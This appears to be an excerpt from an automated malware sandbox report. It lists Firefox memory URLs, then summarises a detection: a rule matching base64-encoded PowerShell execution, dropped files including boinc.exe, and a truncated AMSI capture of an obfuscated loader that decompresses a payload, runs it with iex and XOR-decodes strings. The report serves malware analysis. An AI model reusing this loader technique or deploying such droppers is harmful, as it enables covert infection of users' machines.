Source: firefox.exe, 00000003.00000003.2023659253.000001CA08581000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000003.00000003.1805114198.000001CA0C526000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1845487802.000001CA0C08B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1822023600.000001CA0C08B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://normandy.cdn.mozilla.net/api/v1/
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000003.00000003.1670225801.000001CA1599A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000003.00000003.1634817342.000001CA7F2F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000003.00000003.1535183184.000001CA1B057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://push.services.mozilla.com
Source: firefox.exe, 00000003.00000003.1622567161.000001CA1B17A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://push.services.mozilla.com/
Source: firefox.exe, 00000003.00000003.2096905676.000001CA0B1FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redirector.gvt1.com
Source: firefox.exe, 00000003.00000003.2099687811.000001CA0B16B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redirector.gvt1.com/
Source: firefox.exe, 00000003.00000003.2022641145.000001CA085AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2557.0-win-x64.zip
Source: firefox.exe, 00000003.00000003.1671012859.000001CA154E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000003.00000003.1672248183.000001CA0F1CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1825387742.000001CA0F1CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1704087204.000001CA0F1CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000003.00000003.2105394117.000001CA0CE84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000003.00000003.1825387742.000001CA0F1CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1672248183.000001CA0F1CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
Source: firefox.exe, 00000003.00000003.1528893203.000001CA19CB6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1647546728.000001CA19CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000003.00000003.2094528204.000001CA0B4B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2012410803.000001CA0B4B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com
Source: firefox.exe, 00000003.00000003.2014745861.000001CA0B429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/
Source: firefox.exe, 00000003.00000003.2027247124.000001CA0CE94000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1930166713.000001CA0F1CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1825387742.000001CA0F1CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1672248183.000001CA0F1CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1704087204.000001CA0F1CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000003.00000003.1718320536.000001CA1B116000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000003.00000003.1645054810.000001CA7FE0F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2102737389.000001CA085A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2023659253.000001CA085A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2017734041.000001CA0B145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000003.00000003.1579874813.000001CA1964B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: firefox.exe, 00000003.00000003.2012410803.000001CA0B4D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 00000003.00000003.1822094452.000001CA0C047000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1798915283.000001CA198CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000003.00000003.1535183184.000001CA1B057000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1646841035.000001CA1B026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com
Source: firefox.exe, 00000003.00000003.1535183184.000001CA1B057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/
Source: firefox.exe, 00000003.00000003.1528893203.000001CA19CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000003.00000003.1602997951.000001CA1A9FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000003.00000003.1528893203.000001CA19CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000003.00000003.2105394117.000001CA0CE73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2015163057.000001CA0B419000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000003.00000003.2105394117.000001CA0CE73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2015163057.000001CA0B419000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000003.00000003.1705881637.000001CA0EE2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1800223658.000001CA154B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000008.00000002.2641324645.000002712580A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000003.00000003.1705881637.000001CA0EE2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1632639718.000001CA195E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1774904063.000001CA154AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 00000003.00000003.2105394117.000001CA0CE73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 00000003.00000003.1700724596.000001CA154AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1671012859.000001CA154E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1774904063.000001CA154AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000003.00000003.2105394117.000001CA0CE71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1672954302.000001CA0F15C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1802512268.000001CA0F15C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000003.00000003.2105394117.000001CA0CE71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1672954302.000001CA0F15C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1802512268.000001CA0F15C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000003.00000003.1645054810.000001CA7FE0F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1705327159.000001CA0EE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2102737389.000001CA085A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2023659253.000001CA085A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000003.00000003.1505427923.000001CA0EF98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 00000003.00000003.1505427923.000001CA0EF98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 00000003.00000003.1826663968.000001CA0BEBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1773231866.000001CA15B52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1650975540.000001CA15B52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1747071328.000001CA0BEB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000003.00000003.1807641257.000001CA19C5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1536872816.000001CA19C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/firefox-relay-integration
Source: firefox.exe, 00000003.00000003.1631039337.000001CA1A9FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1728132884.000001CA0C526000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1602997951.000001CA1A9FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1928262787.000001CA1545D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000003.00000003.1527706711.000001CA1B286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: firefox.exe, 00000003.00000003.1720770465.000001CA13657000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/update-firefox-latest-release
Source: firefox.exe, 00000003.00000003.2018426889.000001CA0B0BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1649243278.000001CA1959A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
Source: firefox.exe, 00000003.00000003.1527706711.000001CA1B286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.oGUCFCdKfd-E
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B437000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B437000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B437000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000003.00000003.1645054810.000001CA7FE0F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2102737389.000001CA085A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2023659253.000001CA085A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com/
Source: firefox.exe, 00000003.00000003.1524889211.000001CA7FE5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000003.00000003.1710654212.000001CA0EB0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000003.00000003.1671012859.000001CA154E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000003.00000003.1479322892.000001CA157AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000003.00000003.1439458960.000001CA7F1B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2640388239.000002A67A0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2658026941.0000012918C06000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.3.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_39e4b8f6fd6635158ad433436bdaa069841cfdf8e1989e03
Source: firefox.exe, 00000003.00000003.2105394117.000001CA0CE73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1825167878.000001CA0F1E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1442898301.000001CA09321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1509442711.000001CA196E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1746053955.000001CA0F1E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1442612663.000001CA09000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1671828475.000001CA0F1E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/

System Summary

Source: amsi64_5500.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe (copy)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\boinc.exe
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 8_2_00000271256F2377 NtQuerySystemInformation,8_2_00000271256F2377
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 8_2_0000027126404F32 NtQuerySystemInformation,8_2_0000027126404F32
Source: amsi64_5500.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: powershell.exe, 00000023.00000002.2227525069.000001A703926000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;.VBPf
Source: classification engine Classification label: mal80.evad.winZIP@59/102@76/18
Source: C:\Program Files\Mozilla Firefox\firefox.exe File created: C:\Users\user\AppData\Local\Mozilla\Firefox\SkeletonUILock-c388d246
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2140:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4104:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_762381681
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\BoincSingleInstance
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1228:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:852:120:WilError_03
Source: C:\Program Files\Mozilla Firefox\firefox.exe File created: C:\Users\user\AppData\Local\Temp\firefox
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress) $p42eckaqj80s7wl.CopyTo( $a190kdrcwshytln ) $p42eckaqj80s7wl.Close()$lhwtypigdmu7rje.Close()[byte[]] $ahvjsux0dnb9fkl = $a190kdrcwshytln.ToArray() $v7ejq6u4ylb92nt=$ahvjsux0dnb9fkl return $v7ejq6u4ylb92nt}[byte[]]$lmv45ekn2rs19pa=poq4wxgrfdjtc2b1ka6n03mv7lu $no768xrud1w2bsz[System.Text.Encoding]::ascii.GetString((poq4wxgrfdjtc2b1ka6n03mv7lu "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"))|iex;function sdifbiudu { param($37hbifps61xuja2, $method) $saguhga = [System.Text.Encoding]::ascii.GetBytes("lidfghbne") if ($method -eq "is8dyhv"){ $37hbifps61xuja2 = [System.Text.Encoding]::ascii.GetString([System.Convert]::FromBase64String($37hbifps61xuja2)) } $hsevi6ytd7f4pl5 = [System.Text.Encoding]::ascii.GetBytes($37hbifps61xuja2) $irugha4 = $(for ($z0ugfp6bl7o9ykc = 0; $z0ugfp6bl7o9ykc -lt $hsevi6ytd7f4pl5.length; ) { for ($0njz6lvaf3m5t9k = 0; $0njz6lvaf3m5t9k -lt $saguhga.length; $0njz6lvaf3m5t9k++) { $hsevi6ytd7f4pl5[$z0ugfp6bl7o9ykc] -bxor $saguhga[$0njz6lvaf3m5t9k] $z0ugfp6bl7o9ykc++ if ($z0ugfp6bl7o9ykc -ge $hsevi6ytd7f4pl5.Length) { $0njz6lvaf3m5t9k = $saguhga.length } } }) $irugha4 = [System.Text.Encoding]::ascii.GetString($irugha4) return $irugha4}function Install{$fldopt=('Software Publis
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe"
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1976,i,16268402640929927935,18277506038604385706,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2252 -prefMapHandle 2248 -prefsLen 25250 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7aecee2f-7929-4b59-a925-084c7a102dc1} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca7b26d510 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3848 -parentBuildID 20230927232528 -prefsHandle 2524 -prefMapHandle 2520 -prefsLen 25402 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a34be315-eacf-430b-91ce-f68b9a07f9bb} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca0b1e6b10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5388 -prefMapHandle 5424 -prefsLen 33076 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {12e0202d-ddff-4bd9-9b19-74adcc901a75} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca1b118b10 utility
